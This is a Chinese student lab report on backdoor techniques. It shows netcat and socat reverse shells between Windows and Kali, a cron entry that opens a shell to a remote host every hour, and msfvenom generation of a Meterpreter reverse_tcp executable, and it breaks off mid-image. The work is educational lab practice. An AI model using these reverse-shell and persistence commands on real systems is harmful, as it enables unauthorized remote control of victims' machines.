20154309 【网络对抗技术】Exp2: 后门原理与实践

学习内容：

·使用nc实现win，mac，Linux间的后门连接

·meterpreter的应用

·MSF POST模板的应用

一、后门工具介绍

1.netcat（nc、ncat）

·是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使

用，起到后门作用。

2.socat

·类似于Netcat的加强版

3.Meterpreter

·利用Metaspolit的msfvenom指令生成后门可执行文件，本实验要生成这个后门程序就是Meterpreter

二、ncat、socat的基础操作

2.1 Windows与Linux间获取Shell

2.1.1 Windows主机获取 Linux Shell

Windows：

1.查询本机Ip地址：ipconfig

注意：在多个IP地址中，有两个是VMware的虚拟网卡产生的虚拟IP地址，
不用采用

由图得IPV4地址为：192.168.1.111

2.利用netcat.exe程序监听端口：4309

PS: cd查找路径

kali

3.使用nc 192.168.1.111 4309 -e反向连接Windows主机的4309端口

这张图忘截了...

4.Windows执行linux shell指令

2.1.2 Linux获取Win主机 Shell

Kali

1.查询虚拟机IP地址：ifconfig

IP地址为192.168.186.130

2.Linux系统打开监听端口nc -l -p 4309

3.Windows反弹连接Linux

要找准端口，不然会被积极拒绝...

4.Linux下看到Windows的命令提示

连接成功便可以在Linux下输入Windows指令，此时可以发现汉字为乱码。

2.2 ncat进行数据传输

1.Windows下监听窗口

2.Kali下连接到Windows的端口

3.建立连接后，即可以传输数据

结果图如图所示：

2.3 ncat定时启动

1.Windows输入指令ncat.exe -l -p 4309监听

2.在Kali环境下用 crontab -e 编辑定时任务
在最后一行添加 N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh ，意思是在每个小时的第N分钟反向连接Windows主机的端口，就会启动cron。此处的我取N=21

3.当时间到指定分钟，就已经获得了Kali的shell：

2.4 socat定时启动

1.在Windows桌面按键win+I，依次打开控制面板->系统和安全->管理工具->任务计划，新建一个任务

2.新建一个触发器

3.新建一个操作

4.确定，查看程序是否在运行，如未运行点击右侧运行按钮使其运行

5.Linux输入指令 socat - tcp:192.168.239.1:4305, windows主机IP、端口号，此时可以获取win的shell命令

三、体验 MSF Meterpreter 功能

3.1 利用msfvenom指令生成后门程序

1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154309_backdoor.exe ，此条指令意为生成一个.exe程序，名称为 20154309_backdoor,将来在windows上运行时会回连到Linux主机相应端口

![](